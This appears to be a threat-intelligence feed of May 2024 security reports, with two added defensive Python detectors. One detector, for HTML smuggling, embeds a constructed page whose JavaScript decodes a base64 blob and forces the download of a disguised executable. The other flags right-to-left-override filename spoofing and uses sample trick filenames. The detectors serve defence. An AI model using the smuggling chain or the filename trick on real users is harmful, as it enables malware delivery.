Proofpoint
Intel Name:
Uncovers_Piano_Themed_Email_Scam
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Researchers at Proofpoint have observed a cluster of malicious email campaigns that use piano-themed messages to lure users into advance fee fraud (AFF) scams. The campaigns have been running since at least January 2024 and remain active. Although some other sectors have been targeted, such as healthcare and food and beverage services, most messages are directed at students and faculty at North American schools and universities. So far this year, Proofpoint has seen at least 125,000 messages connected to the piano scam cluster.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-sing-us-song-youre-piano-scam
2024-05-29
Threat_Actors_Actively_Exploiting_CVE_2024_3273
LOW
+
Intel Source:
CYFIRMA
Intel Name:
Threat_Actors_Actively_Exploiting_CVE_2024_3273
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
CYFIRMA researchers have observed threat actors actively exploiting CVE-2024-3273, a severe vulnerability in D-Link NAS devices, and sharing the IP addresses of affected devices on underground forums. With over 90,000 devices globally potentially impacted and the vulnerability listed in CISA's Known Exploited Vulnerabilities catalog, immediate action is essential to protect data and stop unauthorized access. To reduce risk, users should upgrade firmware, change default credentials, and consider retiring end-of-life devices; exposed devices are concentrated in the UK, Russia, Germany, Italy, the USA, and France.
Source: https://www.cyfirma.com/research/threat-actors-actively-exploiting-cve-2024-3273-underground-forums-share-ip-addresses-of-vulnerable-d-link-nas-devices/
2024-05-28
Potential_C2_Seeder_Queries_05282024
MEDIUM
+
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_05282024
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
2024-05-28
Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary
LOW
+
Intel Source:
Huntress
Intel Name:
Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Huntress researchers have uncovered the infrastructure of a widespread phishing campaign using possibly unique tradecraft that combines a transparent proxy, injected iframes, and HTML smuggling. The victim logs into a locally rendered, transparently proxied iframe of the Outlook login portal, which lets the attacker steal the credentials and bypass MFA.
Source: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft
2024-05-28
WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY
LOW
+
Intel Source:
Checkpoint
Intel Name:
WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Check Point researchers have identified a packer family built on NSIS (Nullsoft Scriptable Install System), an installer framework that cybercriminals commonly use to hide malware from detection and analysis. These packers use compression and encryption to produce unique samples that are difficult for antivirus software to detect, and they protect malware families such as AgentTesla, Remcos, and XLoader. NSIS-packed malware typically ships with encrypted files and a malicious DLL that decrypts and executes the payload.
Source: https://research.checkpoint.com/2024/static-unpacking-for-the-widespread-nsis-based-malicious-packer-family/
2024-05-28
Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages
MEDIUM
+
Intel Source:
Forcepoint
Intel Name:
Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
Forcepoint X-Labs researchers have discovered a large number of phishing email instances in their telemetry targeting various government departments in APAC and masquerading as PDF viewer login pages.
Source: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac
2024-05-28
Online_scams_during_Hajj_season
LOW
+
Intel Source:
Resecurity
Intel Name:
Online_scams_during_Hajj_season
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Resecurity researchers observed the rise of fraudulent schemes targeting Hajj pilgrims, highlighting the use of fake websites and social media to impersonate the official Hajj platform, Nusuk. Fraudsters collect sensitive information for identity theft and financial fraud. Also, Resecurity has blocked over 630 accounts distributing fraudulent content. The article advises verifying the authenticity of websites, using official ministry accounts, obtaining written agreements, and reporting scams to authorities. It emphasizes the importance of caution and awareness to prevent victimization during the Hajj season.
Source: https://www.resecurity.com/blog/article/navigating-the-hajj-season-a-time-of-spiritual-unity-and-rising-cyber-threats-targeting-consumers
2024-05-28
Using_Passive_DNS_sources
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Using_Passive_DNS_sources
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
An ISC SANS analyst shared a comprehensive guide to the tools and services used for DNS reconnaissance and enumeration during penetration tests. The diary also covers using Shodan for additional host information and the Cisco Umbrella "Investigate" API for passive DNS data. Practical applications, limitations, and examples of API usage are detailed, emphasizing the value of these tools for identifying network assets and potential vulnerabilities.
Source: https://isc.sans.edu/diary/28596
2024-05-28
Kinsing_malware_hides_itself
LOW
+
Intel Source:
Tenable
Intel Name:
Kinsing_malware_hides_itself
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Tenable researchers discovered that Kinsing also attacks Apache Tomcat servers, and uses new techniques to hide itself on the filesystem, including utilizing innocent and non-suspicious file locations for persistence. In this article, we present our technical findings and share relevant indicators of compromise (IOCs) to help the community defend against this emerging threat.
Source: https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers
2024-05-27
Fake_Antivirus_Sites_Spreading_Android_and_Windows_Malware
LOW
+
Intel Source:
Trellix
Intel Name:
Fake_Antivirus_Sites_Spreading_Android_and_Windows_Malware
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
Trellix researchers observed several fake antivirus websites in mid-April 2024 serving sophisticated malicious files, including APKs, EXEs, and Inno Setup installers with spying and data-theft capabilities. Hosting malware on sites that look legitimate to the public is particularly predatory toward users who are seeking to protect their devices from online threats.
Source: https://www.trellix.com/blogs/research/a-catalog-of-hazardous-av-sites-a-tale-of-malware-hosting/
2024-05-27
Arc_Browser_Windows_Launch_Targeted_by_Google_Ads_Malvertising
LOW
+
Intel Source:
Threatdown
Intel Name:
Arc_Browser_Windows_Launch_Targeted_by_Google_Ads_Malvertising
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
Researchers at ThreatDown have discovered a new Google Ads malvertising campaign, coinciding with the release of the Arc web browser for Windows, that was tricking people into downloading trojanized installers infected with malware payloads. The Arc browser is a new web browser that differentiates itself from other browsers with its creative user interface design.
Source: https://www.threatdown.com/blog/threat-actors-ride-the-hype-for-newly-released-arc-browser/
2024-05-27
TXZ_Files_as_Malspam_Attachments
LOW
+
Intel Source:
ISC.SANS
Intel Name:
TXZ_Files_as_Malspam_Attachments
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
ISC SANS researchers have documented the use of files with a TXZ extension as malspam attachments, an unconventional tactic that threat actors use to evade detection. Examining recent incidents, they describe how these files, disguised as innocuous RAR archives, were used in campaigns targeting Spanish-, Slovak-, Croatian-, and Czech-speaking regions.
Source: https://isc.sans.edu/diary/Files+with+TXZ+extension+used+as+malspam+attachments/30958/
2024-05-27
Iluria_Stealer_is_Variant_of_Another_Discord_Stealer
LOW
+
Intel Source:
CYFIRMA
Intel Name:
Iluria_Stealer_is_Variant_of_Another_Discord_Stealer
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
Iluria Stealer is delivered as an NSIS installer containing an obfuscated Electron application. In its second stage the program downloads a malicious JavaScript file that replaces Discord's index.js, then decrypts malicious code at runtime to steal Discord tokens and browser credentials. The injected file intercepts account modifications such as password and email updates or 2FA activation and relays the information to the attacker's command-and-control (C2) server.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_iluria-stealer-a-variant-of-another-discord-activity-7199376961935138817-74OP?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-05-27
Technical_Analysis_of_SYNAPSE_Ransomware
LOW
+
Intel Source:
CYFIRMA
Intel Name:
Technical_Analysis_of_SYNAPSE_Ransomware
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
CYFIRMA researchers identified the Synapse Ransomware-as-a-Service (RaaS) while monitoring several underground forums. Synapse RaaS was first seen in the wild in February 2024, distributing its payload, SynapseCrypter, through affiliates active on the dark web. The Synapse 1.0.0 stable release advertises fast encryption, multiple encryption modes including custom options, and safeguards against file corruption, plus extras such as silent encryption, NTFS search, and impersonation. It prioritises two spreading mechanisms, a network scanner, and encryption; uses Curve25519/ChaCha8 for encryption; and includes self-deletion and shadow copy wiping. Overall it is a capable ransomware strain, complete with a Tor-based chat system, C2, and payload builder.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_synapse-ransomware-technical-analysis-activity-7199739829952131074-JzMg?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-05-25
Multiple_phishing_campaigns_that_abuse_Cloudflare_workers
MEDIUM
+
Intel Source:
Netskope
Intel Name:
Multiple_phishing_campaigns_that_abuse_Cloudflare_workers
Date of Scan:
2024-05-25
Impact:
MEDIUM
Summary:
Netskope Threat Labs is observing multiple phishing campaigns that abuse Cloudflare Workers. The campaigns use two very different techniques. One campaign uses HTML smuggling, a detection evasion technique often used for downloading malware, to hide phishing content from network inspection. The other uses a method called transparent phishing, where the attacker uses Cloudflare Workers to act as a reverse proxy server for a legitimate login page, intercepting traffic between the victim and the login page to capture credentials, cookies, and tokens.
Source: https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling
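Both the Huntress entry above and this Netskope entry describe HTML smuggling, where the phishing page or malware is carried inside the HTML as an encoded literal and materialised in the browser so that network inspection never sees a file. As an added example that is not code from either vendor, the following Python inspects an HTML page for the decode, materialise and download chain that smuggling relies on and identifies the embedded payload by its magic bytes. The sample page and its fake PE payload are constructed; the indicator list and the threshold of three indicators are assumptions. Transparent (reverse-proxy) phishing is not covered here because in that case the page body is the legitimate login page and there is nothing embedded to inspect.

```python
from __future__ import annotations
import base64
import re

# Constructed sample (not from either report): a page that decodes a base64
# literal client-side, wraps it in a Blob and forces a download of it.
_PAYLOAD = b"MZ" + b"\x90" * 200 + b"constructed-not-a-real-binary"
SAMPLE_HTML = f"""<html><body><p>Loading document...</p><script>
var b64 = "{base64.b64encode(_PAYLOAD).decode()}";
var bin = atob(b64); var arr = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
var blob = new Blob([arr], {{type: "application/octet-stream"}});
var a = document.createElement("a"); a.href = URL.createObjectURL(blob);
a.download = "invoice.pdf.exe"; document.body.appendChild(a); a.click();
</script></body></html>"""

# Pieces of the smuggling chain (assumed list; extend with what you see in the wild).
INDICATORS = {
    "atob(": "client-side base64 decode",
    "charCodeAt": "byte-array rebuild loop",
    "new Blob(": "in-memory file object",
    "createObjectURL": "blob: URL for the file",
    ".download =": "forced download attribute",
    "msSaveOrOpenBlob": "legacy IE/Edge save API",
}
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{200,}={0,2})["\']')
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
MAGIC = {b"MZ": "PE executable", b"PK\x03\x04": "ZIP/Office", b"%PDF": "PDF", b"\x7fELF": "ELF"}


def identify(data: bytes) -> str:
    """File type from the first bytes of a decoded payload."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def analyse_html(html: str) -> dict:
    """Collect chain indicators from inline scripts and decode any long base64
    literal. A single indicator (atob alone is common on benign pages) is not
    enough: the verdict requires at least three plus a decodable payload."""
    scripts = "\n".join(SCRIPT_RE.findall(html))
    hits = [desc for needle, desc in INDICATORS.items() if needle in scripts]
    payloads = []
    for lit in B64_LITERAL.findall(scripts):
        try:
            data = base64.b64decode(lit, validate=True)
        except ValueError:
            continue
        payloads.append({"size": len(data), "type": identify(data)})
    return {"indicators": hits, "payloads": payloads, "smuggling": len(hits) >= 3 and bool(payloads)}


if __name__ == "__main__":
    print(analyse_html(SAMPLE_HTML))
```

Run this over attachments and fetched pages at the mail or proxy layer, where the bytes are still visible; once the browser has run the script, only endpoint telemetry (a file written by the browser process) is left to catch it.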
2024-05-24
The_distribute_of_Gootloader_malware
MEDIUM
+
Intel Source:
Threatdown
Intel Name:
The_distribute_of_Gootloader_malware
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
The ThreatDown analysis shows the intricate workings of the Gootloader malware campaign. Through a well-crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resource. This initial payload creates persistence via scheduled tasks, leading to further PowerShell execution and attempts to connect to malicious command and control servers, enabling data exfiltration and other malicious actions.
Source: https://www.threatdown.com/blog/gootloader-05-23-2024
2024-05-24
SuperOps_RMM_Exploited_for_Unauthorized_Access
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
SuperOps_RMM_Exploited_for_Unauthorized_Access
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
CERT-UA researchers have uncovered a sophisticated cyber attack targeting Ukrainian organizations. The attackers utilize a legitimate program, SuperOps RMM, to gain unauthorized remote access to victims' computers. The attack involves the delivery of a malicious SCR file via email, which, when executed, downloads and executes additional Python code. This code ultimately extracts and runs an MSI file, granting the attackers unauthorized access.
Source: https://cert.gov.ua/article/6279419
2024-05-24
Chinese_Campaign_Targeting_Middle_East_African_and_Asian_Government_Entities
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Chinese_Campaign_Targeting_Middle_East_African_and_Asian_Government_Entities
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
Researchers at Palo Alto Networks have observed a Chinese advanced persistent threat (APT) group running a campaign they refer to as Operation Diplomatic Specter. Since at least late 2022, political entities throughout the Middle East, Africa, and Asia have been the focus of this activity. An examination of the threat actor's operations uncovers long-term espionage against at least seven government entities, with uncommon email exfiltration techniques used against compromised servers to conduct extensive intelligence collection.
Source: https://unit42.paloaltonetworks.com/operation-diplomatic-specter/
2024-05-24
Unveiling_a_Sophisticated_Ransomware_Exploiting_BitLocker
LOW
+
Intel Source:
Securelist
Intel Name:
Unveiling_a_Sophisticated_Ransomware_Exploiting_BitLocker
Date of Scan:
2024-05-24
Impact:
LOW
Summary:
Securelist researchers have discovered how attackers are leveraging native Windows features like BitLocker to execute sophisticated ransomware attacks. This in-depth analysis uncovers the intricacies of the VBScript utilized, the manipulation of disk resizing utilities, encryption techniques, and the covering of tracks.
Source: https://securelist.com/ransomware-abuses-bitlocker/112643/
2024-05-24
The_Justice_AV_Solutions_had_a_backdoor_installer
LOW
+
Intel Source:
Rapid7
Intel Name:
The_Justice_AV_Solutions_had_a_backdoor_installer
Date of Scan:
2024-05-24
Impact:
LOW
Summary:
Rapid7 discovered the JAVS Viewer software version 8.3.7 from Justice AV Solutions contained a backdoor installer letting attackers gain remote control over affected systems. The malicious installer included a binary named fffmpeg.exe which executed obfuscated PowerShell scripts and facilitated unauthorized access, data exfiltration, and credential harvesting. Affected users should immediately re-image compromised endpoints, reset credentials, and install the latest JAVS Viewer version after remediation.
Source: https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/
2024-05-24
Transparent_Tribe_continiues_to_target_Indian_Government_Defense_and_Aerospace_sectors
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
Transparent_Tribe_continiues_to_target_Indian_Government_Defense_and_Aerospace_sectors
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
Over the last couple of months, the Transparent Tribe group has been relying heavily on cross-platform programming languages such as Python, Golang, and Rust, as well as abusing popular web services such as Telegram, Discord, Slack, and Google Drive. We observed the group deploying a range of malicious tools mirroring those used in previous campaigns as well as newer iterations, and we assess with moderate to high confidence that the activity was indeed conducted by Transparent Tribe.
Source: https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors
2024-05-24
Changing_Course_Ransomware_Targeting_Italy
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
Changing_Course_Ransomware_Targeting_Italy
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
CERT-AGID researchers report that the emergence of the "Changing Course" ransomware presents an unusual threat to Italy's cybersecurity landscape. Unlike typical financially motivated ransomware, this malware combines destructive capabilities with a political agenda: using AES encryption and evasive techniques, it encrypts files while promoting an anti-Zionist ideology in its ransom note.
Source: https://cert-agid.gov.it/news/ransomware-cambiare-rotta-una-minaccia-distruttiva-per-litalia/
2024-05-24
A_new_malware_Iluria_stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_new_malware_Iluria_stealer
Date of Scan:
2024-05-24
Impact:
LOW
Summary:
CYFIRMA researchers spotted a new malware, "Iluria Stealer", a variant created by the developer of Nikki Stealer, who uses the alias "Ykg". Both share code with SonicGlyde, a Discord stealer derived from Epsilon Stealer that captures browser cookies, credentials, and credit card information saved in Discord. Iluria Stealer is managed by four individuals: Ykg, Noxty, Outlier, and Ness.
Source: https://www.cyfirma.com/research/iluria-stealer-a-variant-of-another-discord-stealer/
2024-05-24
Sharp_Dragon_Expands_Cyber_Operations_to_Africa_and_the_Caribbean
LOW
+
Intel Source:
Checkpoint
Intel Name:
Sharp_Dragon_Expands_Cyber_Operations_to_Africa_and_the_Caribbean
Date of Scan:
2024-05-24
Impact:
LOW
Summary:
Check Point researchers found that Sharp Dragon, formerly tracked as Sharp Panda, remains active and has shifted its attention to Africa and the Caribbean. This Chinese threat actor gains an initial foothold in new regions by abusing trusted government entities to spread its infection. The actors now use Cobalt Strike Beacon instead of custom backdoors, have expanded their reconnaissance, and select their targets more carefully.
Source: https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/
2024-05-24
KeyPlug_Backdoor_Employed_in_Attacks_Against_Several_Italian_Industries
MEDIUM
+
Intel Source:
Tinexta Cyber
Intel Name:
KeyPlug_Backdoor_Employed_in_Attacks_Against_Several_Italian_Industries
Date of Scan:
2024-05-24
Impact:
MEDIUM
Summary:
Tinexta Cyber researchers uncovered a backdoor known as KeyPlug that hit a variety of Italian industries over several months. The backdoor is attributed to the arsenal of APT41, a group whose origin is tied to China. It was developed to target both Windows and Linux operating systems and uses different communication protocols depending on the configuration of the malware sample.
Source: https://yoroi.company/en/research/uncovering-an-undetected-keyplug-implant-attacking-industries-in-italy/
2024-05-24
CatDDoS_related_gangs_remain_active
LOW
+
Intel Source:
Qianxin
Intel Name:
CatDDoS_related_gangs_remain_active
Date of Scan:
2024-05-24
Impact:
LOW
Summary:
CatDDoS-related gangs remain active: Qianxin's XLab observed them exploiting over 80 vulnerabilities over the last three months, with more than 300 targets per day at peak.
Source: https://blog.xlab.qianxin.com/catddos-derivative-en/?ref=news.risky.biz
2024-05-23
Operation_Diplomatic_Specter_Campaign
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Operation_Diplomatic_Specter_Campaign
Date of Scan:
2024-05-23
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have uncovered an ongoing cyber espionage campaign named Operation Diplomatic Specter, conducted by a Chinese APT group and targeting political entities in the Middle East, Africa, and Asia since 2022. The campaign focuses on seven governmental entities with the aim of collecting sensitive and classified geopolitical information; its primary targets include military operations, political meetings, ministries, and high-ranking officials. The focus on China-related geopolitical and economic information aligns with Chinese state interests.
Source: https://unit42.paloaltonetworks.com/operation-diplomatic-specter/
2024-05-23
Updates_on_Mirai_Malware_Analysis
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Updates_on_Mirai_Malware_Analysis
Date of Scan:
2024-05-23
Impact:
MEDIUM
Summary:
Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining.
Source: https://any.run/malware-trends/mirai
2024-05-22
SamsStealer_stealers_targeting_Windows_systems
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
SamsStealer_stealers_targeting_Windows_systems
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
CYFIRMA's research team recently identified a binary in the wild classified as an information stealer, "SamsStealer". It is a 32-bit Windows executable written in .NET that stealthily extracts sensitive information from victims' systems, targeting a wide range of browsers and applications, including Discord, Chrome, and Microsoft Edge, to steal passwords, cookies, and cryptocurrency wallet data.
Source: https://www.cyfirma.com/research/samsstealer-unveiling-the-information-stealer-targeting-windows-systems/
2024-05-22
Acrid_ScarletStealer_and_Sys01_stealers
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Acrid_ScarletStealer_and_Sys01_stealers
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
Over the last couple of months, Securelist shared several private reports on stealers, covering Acrid (a new stealer), ScarletStealer (another new stealer), and Sys01, which has been updated considerably since the previous public analysis.
Source: https://securelist.com/crimeware-report-stealers/112633/
2024-05-22
Malware_Distribution_via_Cloud_Services_Uses_Unicode_Trick_to_Mislead_Users
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
Malware_Distribution_via_Cloud_Services_Uses_Unicode_Trick_to_Mislead_Users
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
Securonix Threat Labs researchers have uncovered a new attack campaign, tracked as CLOUD#REVERSER, that stages malicious payloads on legitimate cloud storage services such as Google Drive and Dropbox. The campaign's VBScript and PowerShell scripts use Dropbox and Google Drive as staging locations for file uploads and downloads, which in practice amounts to command-and-control activity over trusted cloud domains.
Source: https://www.securonix.com/blog/analysis-and-detection-of-cloudreverser-an-attack-involving-threat-actors-compromising-systems-using-a-sophisticated-cloud-based-malware/
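The Unicode trick in this entry's title is the right-to-left override (U+202E) placed inside a filename: the characters after it are rendered reversed, so a name such as Invoice_[RLO]xcod.scr is displayed as Invoice_rcs.docx while the operating system still treats the file as a .scr. As an added example that is not code from Securonix, the following Python reports the bidirectional control characters in a filename, the name roughly as a user would see it, and the extension the OS will actually act on. The sample filenames are constructed, and the display function is a deliberate simplification of the Unicode bidi algorithm (it handles the override case, not arbitrary mixed-direction text).

```python
from __future__ import annotations

# Bidirectional control code points that can visually reorder a filename.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
RLO, PDF = "\u202e", "\u202c"


def real_extension(name: str) -> str:
    """Extension the OS acts on: text after the last dot once controls are stripped."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_name(name: str) -> str:
    """Approximate rendering: text after an RLO is shown reversed up to the next
    PDF (pop directional formatting) or the end of the string; other controls are
    invisible. Simplification of the bidi algorithm, enough for the override trick."""
    out, i = [], 0
    while i < len(name):
        c = name[i]
        if c == RLO:
            end = name.find(PDF, i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif c in BIDI_CONTROLS:
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def analyse_filename(name: str) -> dict:
    """Flag a filename whose displayed extension differs from its real one
    because of bidi controls. Plain double extensions (report.pdf.exe) are a
    separate check and are not flagged here."""
    controls = [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real = real_extension(name)
    return {
        "controls": controls,
        "displayed": shown,
        "real_extension": real,
        "suspicious": bool(controls) and shown_ext != real,
    }


if __name__ == "__main__":
    for sample in ("Invoice_\u202excod.scr", "report.docx"):   # constructed samples
        print(repr(sample), analyse_filename(sample))
```

A mail gateway or EDR rule can apply the same logic: the presence of any bidi control in an attachment name is already unusual, and a mismatch between the displayed and real extension is a strong signal worth quarantining on.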
2024-05-22
GhostEngine_Mining_Attacks_Using_Vulnerable_Drivers_to_Kill_EDR_Security
LOW
Intel Source:
Antiy and Elastic Security Labs
Intel Name:
GhostEngine_Mining_Attacks_Using_Vulnerable_Drivers_to_Kill_EDR_Security
Date of Scan:
2024-05-22
Impact:
LOW
Summary:
A malicious crypto mining campaign dubbed 'REF4578' has been uncovered distributing a malicious payload known as GhostEngine, which uses vulnerable drivers to disable security products and launch an XMRig miner. Elastic Security Labs and Antiy researchers highlighted the extraordinary sophistication of these crypto-mining attacks in separate studies and shared detection methods to assist defenders in identifying and stopping them.
Source: https://www.antiy.com/response/HideShoveling.html https://www.elastic.co/security-labs/invisible-miners-unveiling-ghostengine
2024-05-22
A_New_threat_actor_Unfading_Sea_Haze_in_South_China
MEDIUM
Intel Source:
Bitdefender Labs
Intel Name:
A_New_threat_actor_Unfading_Sea_Haze_in_South_China
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
Bitdefender Labs has recently uncovered a sophisticated cyberespionage campaign targeting high-level organizations in the South China Sea region. The threat actor behind this campaign, designated "Unfading Sea Haze," aligns with Chinese interests and has been targeting military and government entities since 2018. The group primarily relied on the Gh0st RAT framework but later moved to techniques such as fileless attacks. Their operations include spear-phishing campaigns, custom malware, and the use of legitimate tools for remote access. The attackers also collect sensitive data through keyloggers, browser data stealers, and monitoring of portable devices, exfiltrating data via custom tools and the curl utility.
Source: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/
2024-05-22
Hacktivists_Attack_Philippine_Government_Using_Ransomware
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Hacktivists_Attack_Philippine_Government_Using_Ransomware
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
SentinelOne researchers claim the Ikaruz Red Team is one of a few hacktivist groups targeting Philippine government targets. The group is carrying out "small-scale" attacks with a range of ransomware builders, including AlphV, Vice Society, LockBit, and Clop. Additionally, it promotes online data leaks from several Philippine entities.
Source: https://www.sentinelone.com/blog/ikaruz-red-team-hacktivist-group-leverages-ransomware-for-attention-not-profit/
2024-05-22
Malicious_campaign_placing_backdoors_in_US_Critical_Infrastructure_facilities
MEDIUM
Intel Source:
CTIN
Intel Name:
Malicious_campaign_placing_backdoors_in_US_Critical_Infrastructure_facilities
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
Researchers at CTIN have discovered recent digital forensics evidence that may provide details and analysis of the malicious campaign being undertaken by a Chinese state-sponsored threat actor dubbed Volt Typhoon, which is placing backdoors in US Critical Infrastructure facilities. The evidence presented in the report provides detailed cyber observables for cyber defense teams working to harden servers and hosts against such attacks.
Source: https://cyberthreatintelligencenetwork.com/index.php/2024/05/20/knigsfot-the-covert-cyber-assault-on-global-infrastructure/
2024-05-22
ALPHV_Blackcat_ransomware_alert_for_new_IOCs
MEDIUM
Intel Source:
Infoblox
Intel Name:
ALPHV_Blackcat_ransomware_alert_for_new_IOCs
Date of Scan:
2024-05-22
Impact:
MEDIUM
Summary:
Infoblox received an alert and released new Indicators of Compromise (IoCs), including several command and control (C&C) server domains essential to the kill chain currently used by the Blackcat threat actors.
Source: https://blogs.infoblox.com/threat-intelligence/dns-early-detection-breaking-the-blackcat-ransomware-kill-chain/
2024-05-21
Lumma_Stealer_Malware_Analysis
LOW
Intel Source:
Any.Run
Intel Name:
Lumma_Stealer_Malware_Analysis
Date of Scan:
2024-05-21
Impact:
LOW
Summary:
Lumma is a widely accessible stealer malware that is sold openly across Dark Web forums and Telegram channels. Lumma Stealer poses a significant threat to a wide range of computer systems, targeting devices running Windows operating systems from Windows 7 up to Windows 11. This broad compatibility allows the malware to infiltrate a vast number of systems, increasing its potential reach and impact.
Source: https://any.run/malware-trends/lumma
2024-05-21
Latrodectus_Malware_Loader_Found_in_Phishing_Campaigns_Replacing_IcedID
LOW
Intel Source:
Elastic Security Labs
Intel Name:
Latrodectus_Malware_Loader_Found_in_Phishing_Campaigns_Replacing_IcedID
Date of Scan:
2024-05-21
Impact:
LOW
Summary:
Beginning in early March 2024, researchers at Elastic Security Labs have observed an increase in email phishing campaigns delivering Latrodectus, a newly developed malware loader believed to be the successor to IcedID. These campaigns usually involve a known infection chain: large JavaScript files use WMI to launch msiexec.exe and install an MSI file hosted remotely on a WebDAV share.
Source: https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus
2024-05-21
The_importance_to_implement_MFA
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
The_importance_to_implement_MFA
Date of Scan:
2024-05-21
Impact:
MEDIUM
Summary:
ISC SANS researcher Rob VandenBrink had an interesting call from a client recently: they had a number of "net use" and "psexec" commands pop up on a domain controller, all called from PSEXEC. The source IP was a VPN session.
Source: https://isc.sans.edu/handler_list.html#rob-vandenbrink
2024-05-21
New_Hijack_Loader_Variant
MEDIUM
Intel Source:
Any.Run
Intel Name:
New_Hijack_Loader_Variant
Date of Scan:
2024-05-21
Impact:
MEDIUM
Summary:
Security researchers discovered a new version of Hijack Loader, which decrypts and parses a PNG image to load its second-stage payload. That second stage features a modular architecture, with its primary aim being the injection of the main instrumentation module.
Source: https://any.run/cybersecurity-blog/new-hijackloader-version/ https://any.run/malware-trends/hijackloader
2024-05-21
Remcos_that_uses_a_PrivateLoader_module
MEDIUM
Intel Source:
Sonicwall
Intel Name:
Remcos_that_uses_a_PrivateLoader_module
Date of Scan:
2024-05-21
Impact:
MEDIUM
Summary:
Recently, SonicWall Capture Labs researchers investigated a sample of RemcosRAT that uses a PrivateLoader module to collect additional data about the victim’s machine. By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or on command, this malware is able to infiltrate a system completely and remain undetected.
Source: https://blog.sonicwall.com/en-us/2024/05/remcos-is-pairing-with-privateloader-to-extend-its-capabilities/
2024-05-21
A_campaign_utilizing_malicious_LNK_files_masquerading_as_a_PDF_document
LOW
Intel Source:
Cyble
Intel Name:
A_campaign_utilizing_malicious_LNK_files_masquerading_as_a_PDF_document
Date of Scan:
2024-05-21
Impact:
LOW
Summary:
